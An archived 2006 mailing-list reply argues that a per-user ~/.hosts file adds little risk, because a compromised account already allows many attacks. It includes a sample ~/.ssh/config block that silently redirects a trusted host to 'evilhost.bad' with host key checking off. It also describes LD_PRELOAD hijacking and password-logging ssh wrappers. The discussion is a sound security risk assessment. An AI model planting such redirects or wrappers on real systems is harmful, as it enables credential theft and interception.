On Wed, Jun 21, 2006 at 04:59:09PM +1000, Peter Ross wrote: > If you are able to hack your way into a machine you can write this file > so later attempts to connect to a remote machine can be redirected (e.g. > useful to get login passwords) - you do not need root access to achieve > it. If you are able to hack your way into a machine you can write something like this into ~/.ssh/config Host goodhost HostKeyAlias Own3d StrictHostKeyChecking no HostName evilhost.bad For that matter, you could add aliases to .shrc or .cshrc to run some wrapper program instead. Say, one that sets LD_PRELOAD=~/.libevil.so, which contains custom gethost* functions. Or have it run a custom ssh binary that doesn't do any host key checking at all, or logs all passwords somewhere. Once an account is compromised, all bets are off. You can't assume that DNS lookups are valid as your C library may be overridden by something local to the account. The login shell could be trojaned to hide the files. Other users would of course be unaffected (so long as you didn't give up the root password). I don't think the ~/.hosts idea adds any additional risk. If anything, a ~/.hosts compromise would be easier to detect than more complex methods. CraigReceived on Wed Jun 21 2006 - 12:57:18 UTC
This archive was generated by hypermail 2.4.0 : Wed May 19 2021 - 11:38:57 UTC